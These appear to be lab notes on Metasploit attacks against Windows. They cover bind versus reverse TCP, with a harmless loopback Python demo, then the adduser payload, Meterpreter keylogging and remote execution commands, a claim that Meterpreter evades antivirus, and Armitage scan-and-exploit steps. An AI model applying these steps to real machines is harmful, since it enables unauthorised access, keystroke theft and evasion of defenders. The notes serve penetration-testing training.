Sample of Payloads Available for Targeting Windows Machines

Reverse_TCP vs. Bind_TCP
With a bind payload, the attacker sends the exploit and then makes a connection to the target from the attacking machine: after the exploit runs, the target waits passively for a connection to come in on the payload's port, and the attacker's machine connects to it. This requires an inbound path to the target, so a firewall or NAT in front of the target breaks it.
With a reverse payload, the attacking machine sends the exploit but forces the target machine to connect back to the attacker: rather than passively waiting for an incoming connection on a specified port, the target actively opens a connection to the attacker's LHOST:LPORT. Only outbound access from the target is needed, which most networks allow, and which is why reverse payloads are the usual choice.
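The difference is purely about which side calls listen() and which side calls connect(), and the LHOST/RHOST options map onto that directly. The block below is an added example for this page, not Metasploit's payload code: both "payloads" only answer a single canned sysinfo request and execute nothing, so the two connection directions can be run end to end on 127.0.0.1 (an assumption of the example; the attacker and target would be different hosts in the lab).

```python
"""Bind vs. reverse payloads: which side listens decides whose firewall matters.

Added example, not Metasploit code. The 'payload' side only answers one canned
request (sysinfo) so the connection direction can be exercised on 127.0.0.1.
"""
import platform
import socket
import threading


def payload_answer(request):
    """What the target-side payload does with a request. Deliberately limited to one harmless query."""
    if request == b"sysinfo":
        return platform.platform().encode()
    return b"unknown command"


def handler_session(sock):
    """Attacker-side handler: send one request over an established connection, return the reply."""
    sock.sendall(b"sysinfo")
    return sock.recv(4096)


def payload_session(sock):
    """Target-side payload: serve one request over an established connection, then close."""
    sock.sendall(payload_answer(sock.recv(4096)))
    sock.close()


def listen_once(host, port, on_accept):
    """Whoever listens: accept exactly one connection on host:port in a background thread.
    Returns the bound port (port=0 asks the OS for a free one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        srv.close()
        on_accept(conn)

    threading.Thread(target=run, daemon=True).start()
    return bound_port


def bind_tcp(rhost, lport=0):
    """bind_tcp: the payload LISTENS on the target (RHOST:LPORT) and the handler connects in.
    Needs an inbound path to the target, so any firewall or NAT in front of it kills the session."""
    lport = listen_once(rhost, lport, payload_session)                # runs on the target
    with socket.create_connection((rhost, lport), timeout=5) as s:    # runs on the attacker
        return {"listener": "target", "connect_to": (rhost, lport), "reply": handler_session(s)}


def reverse_tcp(lhost, lport=0):
    """reverse_tcp: the handler LISTENS on the attacker (LHOST:LPORT) and the payload connects out.
    Only needs outbound access from the target, which most networks allow."""
    result = {}
    done = threading.Event()

    def on_accept(conn):                                              # runs on the attacker
        result["reply"] = handler_session(conn)
        conn.close()
        done.set()

    lport = listen_once(lhost, lport, on_accept)
    with socket.create_connection((lhost, lport), timeout=5) as s:    # runs on the target: connect back
        payload_session(s)
    done.wait(5)
    return {"listener": "attacker", "connect_to": (lhost, lport), "reply": result.get("reply")}


if __name__ == "__main__":
    for mode in (bind_tcp, reverse_tcp):
        print(mode.__name__, mode("127.0.0.1"))
```

Read the two functions against the msfconsole options above: bind_tcp only ever needs the target's address (RHOST) and the port the payload listens on, while reverse_tcp needs the address the target must reach (LHOST), which must be routable from the target, not just the attacker's own idea of its IP.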

Hands-On: Metasploit
- Attack the victim PC using msfconsole
- Select windows/adduser for the payload
- Use telnet to connect to the victim using the new user account

Meterpreter: Getting the shell
The Meta-Interpreter, or Meterpreter, is a payload available in Metasploit that gives attackers a powerful command shell that can be used to interact with their target.

Another big advantage of Meterpreter is that, by default, it runs entirely in memory and never writes to the hard drive. This provides a layer of stealth that helps it evade many anti-virus systems and confounds some forensic tools. Meterpreter functions in a manner similar to Windows cmd.exe or the Linux /bin/sh command: once running on the victim machine, it allows the attacker to interact with and execute commands on the target as if the attacker were sitting at the local machine.

Using Meterpreter Payload

Hands-On: Meterpreter
- Use Meterpreter to capture and save keystrokes (keyscan_start, then keyscan_dump)
- Use execute to run mspaint and notepad on the target machine (e.g. execute -f notepad.exe)

Armitage: Point and Click Hacking
Armitage is a front-end for Metasploit built with ease of use in mind. It visualizes your attack situation, recommends the right exploits, manages post-exploitation, and makes pivoting easy.

Using Armitage
At the root console type armitage.
On the Connect dialog box click Connect.

Click Yes to start the Metasploit RPC server and wait.

To scan hosts, on the Hosts menu select MSF Scan. Enter a specific IP address or network range (e.g. 192.168.1.0/24). Target machines will appear with their IP address and OS information.
To attack a specific machine, click or select the machine and on the Attacks menu select Find Attacks. All possible exploits will be queried against the target machine.
To launch an exploit, right-click the target machine and select the exploit to deploy.

Using Armitage

ARP Poisoning: Man in the Middle Attack